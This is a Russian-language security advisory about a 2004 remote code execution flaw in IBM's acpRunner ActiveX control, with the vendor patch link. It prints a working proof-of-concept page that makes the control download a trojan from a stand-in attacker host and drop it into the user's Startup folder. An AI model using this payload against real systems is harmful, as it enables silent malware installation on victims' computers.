Выполнение произвольного кода в acpRunner Activex

Дата публикации:
17.06.2004
Дата изменения:
16.10.2006
Всего просмотров:
1830
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: acpRunner Activex Version 1.2.5.0

Описание: Обнаружена уязвимость в acpRunner. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Уязвимость позволяет атакующему записать произвольный файл в папку Автозагрузка текущего пользователя. Уязвимые методы: "DownLoadURL", "SaveFilePath", и "Download".

Пример/Эксплоит :
-----------Пример---------

<object width="310" height="20" codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab" id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3" data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIAAAEQIAAA==">
</object>

<script>
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
</script>

---------------------------------

URL производителя: http://www.ibm.com/

Решение: Установите обновление:
http://www.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860

Ссылки: IBM acpRunner Activex Dangerous Methods Vulnerability

или введите имя

CAPTCHA